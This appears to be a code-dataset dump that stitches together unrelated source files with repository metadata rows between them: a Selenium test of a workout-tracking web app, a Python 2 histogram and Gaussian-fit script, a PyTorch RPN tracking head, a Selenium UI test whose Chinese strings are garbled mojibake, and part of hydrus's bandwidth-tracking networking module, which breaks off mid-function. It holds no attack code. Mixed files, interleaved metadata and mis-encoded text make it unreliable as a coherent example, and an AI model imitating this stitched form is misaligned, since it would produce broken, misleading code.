self.browser.get(self.live_server_url)
#now visit the second
self.browser.find_element_by_link_text('Reaching').click()
body = self.browser.find_element_by_tag_name('body')
#and check everything is there
self.assertIn('Reaching', body.text)
self.assertIn('Width', body.text)
self.assertIn('67890', self.browser.page_source)
#now check we can navigate to a workout directly
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
#and that all the details are still correct
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('12345', self.browser.page_source)
#now check we can update the result for one of the measures
result_field = self.browser.find_element_by_name('Length')
result_field.clear()
result_field.send_keys('345678')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#and that if we revisit the page the change stuck
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Jumping', body.text)
self.assertIn('Length', body.text)
self.assertIn('345678', self.browser.page_source)
#then go back to homepage
self.browser.find_element_by_link_text("Home").click()
#and follow the add link to create a new workout
self.browser.find_element_by_link_text("Add").click()
#choose the second type of exercise
self.browser.find_element_by_xpath("//select/option[@value='2']").click()
self.browser.find_element_by_link_text("Today").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#we should have been taken to the result editing page and be presented with appropriate choices
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Reaching', body.text)
self.assertIn('Width', body.text)
#find the result field and set the result
result_field = self.browser.find_element_by_name('Width')
result_field.clear()
result_field.send_keys('234')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#check it looks like we are back on the homepage
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Workouts', body.text)
self.assertIn('Jumping', body.text)
self.assertIn('Reaching', body.text)
#Now try to follow the link to our new workout
self.browser.find_element_by_link_text("Reaching").click()
#and check the new result was logged
self.assertIn('234', self.browser.page_source)
#now try to add a new workout directly
self.browser.get(self.live_server_url + '/workout/add/')
#give an invalid date
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-565-23')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Check we were told off for entering an invalid choice
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Enter a valid date', body.text)
#Now go back to the first workout
self.browser.get(self.live_server_url + '/workout/1/')
#And try to alter the score to an invalid one
result_field = self.browser.find_element_by_name('Length')
result_field.clear()
result_field.send_keys('34ss5678')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Check we were told off for entering an invalid choice
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Enter a number', body.text)
#Now go back to the first workout
self.browser.get(self.live_server_url + '/workout/1/')
#And try to delete it
self.browser.find_element_by_link_text("Delete this workout").click()
#Now try to reopen the workout
self.browser.get(self.live_server_url + '/workout/1/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("That workout doesn't exist", body.text)
#Now try to directly delete a non-existent workout
self.browser.get(self.live_server_url + '/workout/1/delete')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("That workout doesn't exist", body.text)
#Now go to the second workouts edit view
self.browser.get(self.live_server_url + '/workout/2/edit/')
#And try to edit it
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-06-24')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now try to reopen the workout and check the date changed
self.browser.get(self.live_server_url + '/workout/2/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Thursday 24 June 2010", body.text)
self.assertIn("Reaching", body.text)
#Now go to the second workout
self.browser.get(self.live_server_url + '/workout/2/')
#And try to edit it
self.browser.find_element_by_link_text("Edit this workout").click()
self.browser.find_element_by_xpath("//select/option[@value='1']").click()
date_field = self.browser.find_element_by_name('time_of_workout')
date_field.clear()
date_field.send_keys('2010-06-23')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now try to reopen the workout and check the date changed
self.browser.get(self.live_server_url + '/workout/2/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Wednesday 23 June 2010", body.text)
self.assertIn("Jumping", body.text)
#Now try to follow the Measures Link
self.browser.find_element_by_link_text("Measures").click()
#Check the page shows our existing measures
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Length", body.text)
self.assertIn("Width", body.text)
#Check the page doesn't have a delete facility
self.assertNotIn("Delete", body.text)
#Check it does have an add button/link
self.assertIn("Add measure", body.text)
#follow the link to add a new measure
self.browser.find_element_by_link_text("Add measure").click()
#Try to add a new measure
measure_field = self.browser.find_element_by_name('name')
measure_field.send_keys('Breadth')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the measures page and verify that the measure is there
self.browser.get(self.live_server_url + '/measures/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Breadth", body.text)
        #Now try to visit the Exercises Link
self.browser.find_element_by_link_text("Exercises").click()
#Check the page shows our existing exercises
body = self.browser.find_element_by_tag_name('body')
self.assertIn("Jumping", body.text)
self.assertIn("Reaching", body.text)
#Check the page doesn't have a delete facility
self.assertNotIn("Delete", body.text)
#Check it does have an add button/link
self.assertIn("Add exercise", body.text)
#follow the link to add a new exercise
self.browser.find_element_by_link_text("Add exercise").click()
#Try to add a new exercise
exercise_field = self.browser.find_element_by_name('name')
exercise_field.send_keys('Stretching')
self.browser.find_element_by_xpath("//input[@value='2']").click()
self.browser.find_element_by_xpath("//input[@value='3']").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the exercises page and verify that the exercise is there
self.browser.get(self.live_server_url + '/exercises/')
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
#Now let's add a new workout with our new exercise and measure
self.browser.find_element_by_link_text("Add").click()
self.browser.find_element_by_xpath("//select/option[@value='3']").click()
self.browser.find_element_by_link_text("Today").click()
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#we should have been taken to the result editing page and be presented with appropriate choices
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
self.assertIn('Breadth', body.text)
self.assertIn('Width', body.text)
self.assertNotIn('Length', body.text)
#find the result field and set the result
result_field = self.browser.find_element_by_name('Width')
result_field.clear()
result_field.send_keys('234')
result_field = self.browser.find_element_by_name('Breadth')
result_field.clear()
result_field.send_keys('345')
save_button = self.browser.find_element_by_xpath("//button[@type='submit']")
save_button.click()
#Now Navigate back to the exercises page and then click the link for our first exercise
self.browser.get(self.live_server_url + '/exercises/')
self.browser.find_element_by_link_text("Stretching").click()
#The page should have details of our exercise
body = self.browser.find_element_by_tag_name('body')
self.assertIn('Stretching', body.text)
self.assertIn('Width', body.text)
self.assertIn('234', body.text)
self.assertIn('Breadth', body.text)
self.assertIn('345', body.text)
#Now go to workout 4 and check we have a link back to the exercise page
self.browser.get(self.live_server_url + '/workout/4/')
self.browser.find_element_by_link_text("Stretching").click()
|
[
"phil@parsons.uk.com"
] |
phil@parsons.uk.com
|
d6d72b632eee1e7e11f2658e74868cd2b2f3ef7a
|
e3be689445fb37a275bf003240738ab7311445e0
|
/hist-gauss/hist.py
|
6fbe60ad944253f4cad4e6ef3138268564064a74
|
[] |
no_license
|
dvgreetham/PhD-tools
|
407d6e8dd16023839a556b4e3ce10d1ce90deda9
|
a1bfac1abc7a2464dcb3d000d33636c863136c62
|
refs/heads/master
| 2020-05-17T03:00:38.024971
| 2019-02-05T11:05:23
| 2019-02-05T11:05:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,401
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 14 10:43:45 2018
@author: goranbs
compute, plot and write the histogram of a dataset
"""
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.optimize import curve_fit
# ------------------------------------------------ #
if len(sys.argv) < 3:
print "\nRead columnar data set to compute histogram"
print "Useage: hist.py filename colnr [nbins]\n"
print "lines ignored in 'filename' starts with: #"
print "filename : data file with columnar data"
print "colnr : column to use in data set from file 'filename'"
print "nbins : number of bins used in histogram [default nbins=100]"
sys.exit()
# ------------------------------------------------ #
name = sys.argv[1]
colnr = int(sys.argv[2]) - 1
try:
nbins = int(sys.argv[3])
except:
nbins = 100
#print name, colnr, nbins
def write_data(x,y,gauss_fit,popt):
pref = name[:name.rfind(".")]
outfile = pref + '.out'
fopen = open(outfile,'w')
header = "# hist.py name={} colnr={} nbins={}\n".format(name,(colnr+1),nbins)
subhead1 = "# Gaussian fit: a0={} mean={} sigma={}\n".format(popt[0],popt[1],popt[2])
subhead2 = "# x count gauss_fit\n"
fopen.write(header)
fopen.write(subhead1)
fopen.write(subhead2)
for i in xrange(len(x)):
fopen.write("{:f} {:f} {:f}\n".format(x[i],y[i],gauss_fit[i]))
fopen.close()
def gauss(x,a,x0,sigma):
return a*np.exp(-(x-x0)**2/(2*sigma**2))
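# e.g. gauss(0.0, a=1.0, x0=0.0, sigma=1.0) == 1.0; this is a scaled Gaussian
# bump with peak height a, not a density normalized to unit area.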
# -- do the magic
data = np.loadtxt(fname=name,comments='#')
data = data[:,colnr]
hist, bin_edges = np.histogram(data,bins=nbins,normed=False)
# -- initial guess for the gaussian
a_0=1
mean_0=1
sigma_0=1
#print np.shape(hist), np.shape(bin_edges)
# -- curve fit
delta=bin_edges[1]-bin_edges[0]
bin_centers=(bin_edges[:-1]+delta/2.0) # midpoints of the bins, not their right edges
popt, pcov = curve_fit(gauss,bin_centers,hist,p0=[a_0,mean_0,sigma_0])
print '--'*20
print 'gaussian fit:'
print ['a0','mean','sigma']
print popt
print '--'*20
plotting='no'
if plotting=='yes':
plt.figure()
plt.hist(data, bins=nbins, normed=False, label='hist')
plt.plot(bin_centers, gauss(bin_centers,*popt), '--', label='gauss')
plt.xlabel('x')
plt.ylabel('count')
plt.legend()
plt.show()
write_data(bin_centers,hist,gauss(bin_centers,*popt),popt)
# ------------------------------------------------------- EOF
|
[
"g.svaland15@imperial.ac.uk"
] |
g.svaland15@imperial.ac.uk
|
2681855eee69bd7b63dea1ac73d3aa9a3853b399
|
4ba091b217faddd0ee053c6f5f49547a3fc2713d
|
/big_feature/pysot/models/head/rpn.py
|
3ab768d43d54393a17e89c04725fc93ae0269920
|
[] |
no_license
|
Catchen98/SOT-Projects
|
98cb90058c288596dbf516004777553e176a5250
|
352f43cd7d615fbdb08246fad9aefee03beca9e3
|
refs/heads/master
| 2022-12-19T00:56:43.095395
| 2020-09-17T13:30:23
| 2020-09-17T13:30:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,485
|
py
|
# Copyright (c) SenseTime. All Rights Reserved.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
from pysot.core.xcorr import xcorr_fast, xcorr_depthwise
from pysot.models.init_weight import init_weights
class RPN(nn.Module):
def __init__(self):
super(RPN, self).__init__()
def forward(self, z_f, x_f):
raise NotImplementedError
class UPChannelRPN(RPN):
def __init__(self, anchor_num=5, feature_in=256):
super(UPChannelRPN, self).__init__()
cls_output = 2 * anchor_num
loc_output = 4 * anchor_num
self.template_cls_conv = nn.Conv2d(feature_in,
feature_in * cls_output, kernel_size=3)
self.template_loc_conv = nn.Conv2d(feature_in,
feature_in * loc_output, kernel_size=3)
self.search_cls_conv = nn.Conv2d(feature_in,
feature_in, kernel_size=3)
self.search_loc_conv = nn.Conv2d(feature_in,
feature_in, kernel_size=3)
self.loc_adjust = nn.Conv2d(loc_output, loc_output, kernel_size=1)
def forward(self, z_f, x_f):
cls_kernel = self.template_cls_conv(z_f)
loc_kernel = self.template_loc_conv(z_f)
cls_feature = self.search_cls_conv(x_f)
loc_feature = self.search_loc_conv(x_f)
cls = xcorr_fast(cls_feature, cls_kernel)
loc = self.loc_adjust(xcorr_fast(loc_feature, loc_kernel))
return cls, loc
class DepthwiseXCorr(nn.Module):
def __init__(self, in_channels, hidden, out_channels, kernel_size=3, hidden_kernel_size=5):
super(DepthwiseXCorr, self).__init__()
self.conv_kernel = nn.Sequential(
nn.Conv2d(in_channels, hidden, kernel_size=kernel_size, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
)
self.conv_search = nn.Sequential(
nn.Conv2d(in_channels, hidden, kernel_size=kernel_size, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
)
self.head = nn.Sequential(
nn.Conv2d(hidden, hidden, kernel_size=1, bias=False),
nn.BatchNorm2d(hidden),
nn.ReLU(inplace=True),
nn.Conv2d(hidden, out_channels, kernel_size=1)
)
def forward(self, kernel, search):
kernel = self.conv_kernel(kernel)
search = self.conv_search(search)
feature = xcorr_depthwise(search, kernel)
out = self.head(feature)
return out, kernel, search
class DepthwiseRPN(RPN):
def __init__(self, anchor_num=5, in_channels=256, out_channels=256):
super(DepthwiseRPN, self).__init__()
self.cls = DepthwiseXCorr(in_channels, out_channels, 2 * anchor_num)
self.loc = DepthwiseXCorr(in_channels, out_channels, 4 * anchor_num)
def forward(self, z_f, x_f):
cls, kernel, cls_feature = self.cls(z_f, x_f)
loc, _, _ = self.loc(z_f, x_f)
return cls, loc
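# Rough usage sketch (tensor shapes are assumptions, not checked here):
#   rpn = DepthwiseRPN(anchor_num=5, in_channels=256)
#   cls, loc = rpn(z_f, x_f)  # z_f: template features, x_f: search features
# cls has 2*anchor_num output channels, loc has 4*anchor_num.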
class MultiRPN(RPN):
def __init__(self, anchor_num, in_channels, weighted=False):
super(MultiRPN, self).__init__()
self.weighted = weighted
for i in range(len(in_channels)):
self.add_module('rpn'+str(i+2),
DepthwiseRPN(anchor_num, in_channels[i]//2, in_channels[i]//2))
if self.weighted:
self.cls_weight = nn.Parameter(torch.ones(len(in_channels)))
self.loc_weight = nn.Parameter(torch.ones(len(in_channels)))
def forward(self, z_fs, x_fs):
cls = []
loc = []
for idx, (z_f, x_f) in enumerate(zip(z_fs, x_fs), start=2):
rpn = getattr(self, 'rpn'+str(idx))
c, l = rpn(z_f, x_f)
cls.append(c)
loc.append(l)
if self.weighted:
cls_weight = F.softmax(self.cls_weight, 0)
loc_weight = F.softmax(self.loc_weight, 0)
def avg(lst):
return sum(lst) / len(lst)
def weighted_avg(lst, weight):
s = 0
for i in range(len(weight)):
s += lst[i] * weight[i]
return s
if self.weighted:
return weighted_avg(cls, cls_weight), weighted_avg(loc, loc_weight)
else:
return avg(cls), avg(loc)
|
[
"1850357388@qq.com"
] |
1850357388@qq.com
|
f7afa319768395b6eef4accf776458d254625b6a
|
4a9995871447a406a7e6307a030503700cd41226
|
/script/testCase/Y3me้กน็ฎ/ๆฐๅญๅๅปบๆจก/ไผๅไธญๅฟ/ๆ ็ญพๅ็ฑป.py
|
1085b33fd1c37f473f55bd6f1171e6c1ce96626a
|
[] |
no_license
|
juntaoh1234/12122003
|
96a107ce22d930e8d9517810736d8f6ce92dc7ad
|
4bee39286c3708d7a0df3001e0daa9da51478170
|
refs/heads/master
| 2020-10-01T18:20:01.572599
| 2019-12-12T12:04:08
| 2019-12-12T12:04:08
| 227,596,967
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,973
|
py
|
# coding=utf-8
from time import time, sleep
from SRC.common.decorator import codeException_dec
from SRC.unittest.case import TestCase
from script.common import utils
from selenium import webdriver
from selenium.webdriver import ActionChains
class EasyCase(TestCase):
def __init__(self, webDriver, paramsList):
        # Please do not modify this method (124421)
super(EasyCase, self).__init__(webDriver, paramsList)
@codeException_dec('3')
def runTest(self):
driver = self.getDriver()
param = self.param
tool = utils
driver.refresh()
        # Top-left public node
driver.find_element_by_class_name('lebra-navbar-left-icon').click()
sleep(3)
        # Enter "่ฅ้็ฎก็" (Marketing Management)
driver.find_element_by_xpath('//*[text()="่ฅ้็ฎก็"]').click()
sleep(3)
        # Enter the first-level node
menu2 = driver.find_element_by_css_selector('span[title="ไผๅไธญๅฟ"]')
actions = ActionChains(driver)
actions.move_to_element(menu2)
actions.click(menu2)
actions.perform()
sleep(3)
        # Enter the second-level node
menu3 = driver.find_element_by_css_selector('li[class="bottomBar"][title="ๆ ็ญพๅ็ฑป"]')
actions.move_to_element(menu3)
actions.click(menu3)
actions.perform()
sleep(3)
titleName = driver.find_element_by_css_selector(
'#home_header > div > div.tab--38iB- > ul > li > p').get_attribute('title')
assert u"ๆ ็ญพๅ็ฑป" in titleName, u"้กต้ขๆบ็ ไธญไธๅญๅจ่ฏฅๅ
ณ้ฎๅญ๏ผ"
sleep(3)
iframe = driver.find_element_by_id('SDMB020401')
driver.switch_to.frame(iframe)
        # Delete
driver.find_element_by_id('btn_del').click()
sleep(3)
driver.switch_to.default_content()
driver.find_element_by_class_name('u-button').click()
sleep(3)
driver.find_element_by_class_name('u-dropdown-menu-item').click()
sleep(3)
|
[
"1341890679@qq.com"
] |
1341890679@qq.com
|
8ad8ff8a9685b9435f5d29a63a84df3cf8caf11c
|
7198404ed7691e4061f511e35071717ca81254b2
|
/hydrus/core/HydrusNetworking.py
|
0eb37b75f999a972a9ddb676c1c8fd0f3c8a6e0e
|
[
"WTFPL"
] |
permissive
|
seniorm0ment/hydrus
|
d05b0bb83c54c258971fbb0797cbd28565945619
|
78261ecf9e192877013671ed7ee4517da581f900
|
refs/heads/master
| 2023-03-14T15:59:42.386590
| 2021-03-23T21:05:43
| 2021-03-23T21:05:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,038
|
py
|
import calendar
import collections
import datetime
import http.client
import json
import psutil
import socket
import threading
import urllib
import urllib3
from urllib3.exceptions import InsecureRequestWarning
urllib3.disable_warnings( InsecureRequestWarning ) # stopping log-moaning when request sessions have verify = False
from hydrus.core import HydrusConstants as HC
from hydrus.core import HydrusData
from hydrus.core import HydrusExceptions
from hydrus.core import HydrusSerialisable
# The calendar portion of this works in GMT. A new 'day' or 'month' is calculated based on GMT time, so it won't tick over at midnight for most people.
# But this means a server can pass a bandwidth object to a lad and everyone can agree on when a new day is.
def ConvertBandwidthRuleToString( rule ):
( bandwidth_type, time_delta, max_allowed ) = rule
if max_allowed == 0:
return 'No requests currently permitted.'
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
s = HydrusData.ToHumanBytes( max_allowed )
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
s = HydrusData.ToHumanInt( max_allowed ) + ' rqs'
if time_delta is None:
s += ' per month'
else:
s += ' per ' + HydrusData.TimeDeltaToPrettyTimeDelta( time_delta )
return s
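# e.g. ConvertBandwidthRuleToString( ( HC.BANDWIDTH_TYPE_REQUESTS, 60, 10 ) )
# returns something like '10 rqs per 1 minute' (the exact wording depends on
# the HydrusData pretty-printing helpers).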
def LocalPortInUse( port ):
if HC.PLATFORM_WINDOWS:
for sconn in psutil.net_connections():
if port == sconn.laddr[1] and sconn.status in ( 'ESTABLISHED', 'LISTEN' ): # local address: ( ip, port )
return True
return False
else:
s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
s.settimeout( 0.2 )
result = s.connect_ex( ( '127.0.0.1', port ) )
s.close()
CONNECTION_SUCCESS = 0
return result == CONNECTION_SUCCESS
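# e.g. LocalPortInUse( 45869 ) -> True if some local service is listening on
# that port (45869 is just an illustrative value).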
def ParseTwistedRequestGETArgs( requests_args, int_params, byte_params, string_params, json_params, json_byte_list_params ):
args = ParsedRequestArguments()
for name_bytes in requests_args:
values_bytes = requests_args[ name_bytes ]
try:
name = str( name_bytes, 'utf-8' )
except UnicodeDecodeError:
continue
value_bytes = values_bytes[0]
try:
value = str( value_bytes, 'utf-8' )
except UnicodeDecodeError:
continue
if name in int_params:
try:
args[ name ] = int( value )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as an integer, but it failed.' )
elif name in byte_params:
try:
args[ name ] = bytes.fromhex( value )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a hex string, but it failed.' )
elif name in string_params:
try:
args[ name ] = urllib.parse.unquote( value )
except:
                raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a percent-encoded string, but it failed.' )
elif name in json_params:
try:
args[ name ] = json.loads( urllib.parse.unquote( value ) )
except:
raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a json-encoded string, but it failed.' )
elif name in json_byte_list_params:
try:
list_of_hex_strings = json.loads( urllib.parse.unquote( value ) )
args[ name ] = [ bytes.fromhex( hex_string ) for hex_string in list_of_hex_strings ]
except:
                raise HydrusExceptions.BadRequestException( 'I was expecting to parse \'' + name + '\' as a json-encoded list of hex strings, but it failed.' )
return args
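# Illustrative example (values are made up): for a query string like
# ?num=5&subject_identifier=abcd, with 'num' in int_params and
# 'subject_identifier' in byte_params, args becomes
# { 'num': 5, 'subject_identifier': b'\xab\xcd' }.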
class ParsedRequestArguments( dict ):
def __missing__( self, key ):
raise HydrusExceptions.BadRequestException( 'It looks like the parameter "{}" was missing!'.format( key ) )
def GetValue( self, key, expected_type, default_value = None ):
if key in self:
value = self[ key ]
if not isinstance( value, expected_type ):
error_text_lookup = {}
error_text_lookup[ int ] = 'integer'
error_text_lookup[ str ] = 'string'
error_text_lookup[ bytes ] = 'hex-encoded bytestring'
error_text_lookup[ bool ] = 'boolean'
error_text_lookup[ list ] = 'list'
error_text_lookup[ dict ] = 'object/dict'
if expected_type in error_text_lookup:
type_error_text = error_text_lookup[ expected_type ]
else:
type_error_text = 'unknown!'
raise HydrusExceptions.BadRequestException( 'The parameter "{}" was not the expected type: {}!'.format( key, type_error_text ) )
return value
else:
if default_value is None:
raise HydrusExceptions.BadRequestException( 'The required parameter "{}" was missing!'.format( key ) )
else:
return default_value
class BandwidthRules( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_RULES
SERIALISABLE_NAME = 'Bandwidth Rules'
SERIALISABLE_VERSION = 1
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self._lock = threading.Lock()
self._rules = set()
def _GetSerialisableInfo( self ):
return list( self._rules )
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
# tuples converted to lists via json
self._rules = set( ( tuple( rule_list ) for rule_list in serialisable_info ) )
def AddRule( self, bandwidth_type, time_delta, max_allowed ):
with self._lock:
rule = ( bandwidth_type, time_delta, max_allowed )
self._rules.add( rule )
def CanContinueDownload( self, bandwidth_tracker, threshold = 15 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not stop ongoing just because starts are throttled
requests_rule = bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS
# Do not block an ongoing jpg download because the current month is 100.03% used
wait_is_too_long = time_delta is None or time_delta > threshold
ignore_rule = requests_rule or wait_is_too_long
if ignore_rule:
continue
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def CanDoWork( self, bandwidth_tracker, expected_requests, expected_bytes, threshold = 30 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not prohibit a raft of work starting or continuing because one small rule is over at this current second
if time_delta is not None and time_delta <= threshold:
continue
# we don't want to do a tiny amount of work, we want to do a decent whack
if bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
max_allowed -= expected_requests
elif bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
max_allowed -= expected_bytes
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def CanStartRequest( self, bandwidth_tracker, threshold = 5 ):
with self._lock:
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
# Do not prohibit a new job from starting just because the current download speed is 210/200KB/s
ignore_rule = bandwidth_type == HC.BANDWIDTH_TYPE_DATA and time_delta is not None and time_delta <= threshold
if ignore_rule:
continue
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
return False
return True
def GetWaitingEstimate( self, bandwidth_tracker ):
with self._lock:
estimates = []
for ( bandwidth_type, time_delta, max_allowed ) in self._rules:
if bandwidth_tracker.GetUsage( bandwidth_type, time_delta ) >= max_allowed:
estimates.append( bandwidth_tracker.GetWaitingEstimate( bandwidth_type, time_delta, max_allowed ) )
if len( estimates ) == 0:
return 0
else:
return max( estimates )
def GetBandwidthStringsAndGaugeTuples( self, bandwidth_tracker, threshold = 600 ):
with self._lock:
rows = []
rules_sorted = list( self._rules )
def key( rule_tuple ):
( bandwidth_type, time_delta, max_allowed ) = rule_tuple
if time_delta is None:
return -1
else:
return time_delta
rules_sorted.sort( key = key )
for ( bandwidth_type, time_delta, max_allowed ) in rules_sorted:
time_is_less_than_threshold = time_delta is not None and time_delta <= threshold
if time_is_less_than_threshold or max_allowed == 0:
continue
usage = bandwidth_tracker.GetUsage( bandwidth_type, time_delta )
s = 'used '
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
s += HydrusData.ConvertValueRangeToBytes( usage, max_allowed )
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
s += HydrusData.ConvertValueRangeToPrettyString( usage, max_allowed ) + ' requests'
if time_delta is None:
s += ' this month'
else:
s += ' in the past ' + HydrusData.TimeDeltaToPrettyTimeDelta( time_delta )
rows.append( ( s, ( usage, max_allowed ) ) )
return rows
def GetRules( self ):
with self._lock:
return list( self._rules )
HydrusSerialisable.SERIALISABLE_TYPES_TO_OBJECT_TYPES[ HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_RULES ] = BandwidthRules
class BandwidthTracker( HydrusSerialisable.SerialisableBase ):
SERIALISABLE_TYPE = HydrusSerialisable.SERIALISABLE_TYPE_BANDWIDTH_TRACKER
SERIALISABLE_NAME = 'Bandwidth Tracker'
SERIALISABLE_VERSION = 1
# I want to track and query using smaller periods even when the total time delta is larger than the next step up to increase granularity
# for instance, querying minutes for 90 mins time delta is more smooth than watching a juddery sliding two hour window
MAX_SECONDS_TIME_DELTA = 240
MAX_MINUTES_TIME_DELTA = 180 * 60
MAX_HOURS_TIME_DELTA = 72 * 3600
MAX_DAYS_TIME_DELTA = 31 * 86400
CACHE_MAINTENANCE_TIME_DELTA = 120
MIN_TIME_DELTA_FOR_USER = 10
def __init__( self ):
HydrusSerialisable.SerialisableBase.__init__( self )
self._lock = threading.Lock()
self._next_cache_maintenance_timestamp = HydrusData.GetNow() + self.CACHE_MAINTENANCE_TIME_DELTA
self._months_bytes = collections.Counter()
self._days_bytes = collections.Counter()
self._hours_bytes = collections.Counter()
self._minutes_bytes = collections.Counter()
self._seconds_bytes = collections.Counter()
self._months_requests = collections.Counter()
self._days_requests = collections.Counter()
self._hours_requests = collections.Counter()
self._minutes_requests = collections.Counter()
self._seconds_requests = collections.Counter()
def _GetSerialisableInfo( self ):
dicts_flat = []
for d in ( self._months_bytes, self._days_bytes, self._hours_bytes, self._minutes_bytes, self._seconds_bytes, self._months_requests, self._days_requests, self._hours_requests, self._minutes_requests, self._seconds_requests ):
dicts_flat.append( list( d.items() ) )
return dicts_flat
def _InitialiseFromSerialisableInfo( self, serialisable_info ):
counters = [ collections.Counter( dict( flat_dict ) ) for flat_dict in serialisable_info ]
# unusual error someone reported by email--it came back an empty list, fugg
if len( counters ) != 10:
return
self._months_bytes = counters[ 0 ]
self._days_bytes = counters[ 1 ]
self._hours_bytes = counters[ 2 ]
self._minutes_bytes = counters[ 3 ]
self._seconds_bytes = counters[ 4 ]
self._months_requests = counters[ 5 ]
self._days_requests = counters[ 6 ]
self._hours_requests = counters[ 7 ]
self._minutes_requests = counters[ 8 ]
self._seconds_requests = counters[ 9 ]
def _GetCurrentDateTime( self ):
# keep getnow in here for the moment to aid in testing, which patches it to do time shifting
return datetime.datetime.utcfromtimestamp( HydrusData.GetNow() )
def _GetWindowAndCounter( self, bandwidth_type, time_delta ):
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
if time_delta < self.MAX_SECONDS_TIME_DELTA:
window = 0
counter = self._seconds_bytes
elif time_delta < self.MAX_MINUTES_TIME_DELTA:
window = 59
counter = self._minutes_bytes
elif time_delta < self.MAX_HOURS_TIME_DELTA:
window = 3599
counter = self._hours_bytes
else:
window = 86399
counter = self._days_bytes
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
if time_delta < self.MAX_SECONDS_TIME_DELTA:
window = 0
counter = self._seconds_requests
elif time_delta < self.MAX_MINUTES_TIME_DELTA:
window = 59
counter = self._minutes_requests
elif time_delta < self.MAX_HOURS_TIME_DELTA:
window = 3599
counter = self._hours_requests
else:
window = 86399
counter = self._days_requests
return ( window, counter )
def _GetMonthTime( self, dt ):
( year, month ) = ( dt.year, dt.month )
month_dt = datetime.datetime( year, month, 1 )
month_time = int( calendar.timegm( month_dt.timetuple() ) )
return month_time
def _GetRawUsage( self, bandwidth_type, time_delta ):
if time_delta is None:
dt = self._GetCurrentDateTime()
month_time = self._GetMonthTime( dt )
if bandwidth_type == HC.BANDWIDTH_TYPE_DATA:
return self._months_bytes[ month_time ]
elif bandwidth_type == HC.BANDWIDTH_TYPE_REQUESTS:
return self._months_requests[ month_time ]
( window, counter ) = self._GetWindowAndCounter( bandwidth_type, time_delta )
if time_delta == 1:
# the case of 1 poses a problem as our min block width is also 1. we can't have a window of 0.1s to make the transition smooth
# if we include the last second's data in an effort to span the whole previous 1000ms, we end up not doing anything until the next second rolls over
# this causes 50% consumption as we consume in the second after the one we verified was clear
# so, let's just check the current second and be happy with it
now = HydrusData.GetNow()
if now in counter:
return counter[ now ]
else:
return 0
else:
# we need the 'window' because this tracks brackets from the first timestamp and we want to include if 'since' lands anywhere in the bracket
# e.g. if it is 1200 and we want the past 1,000, we also need the bracket starting at 0, which will include 200-999
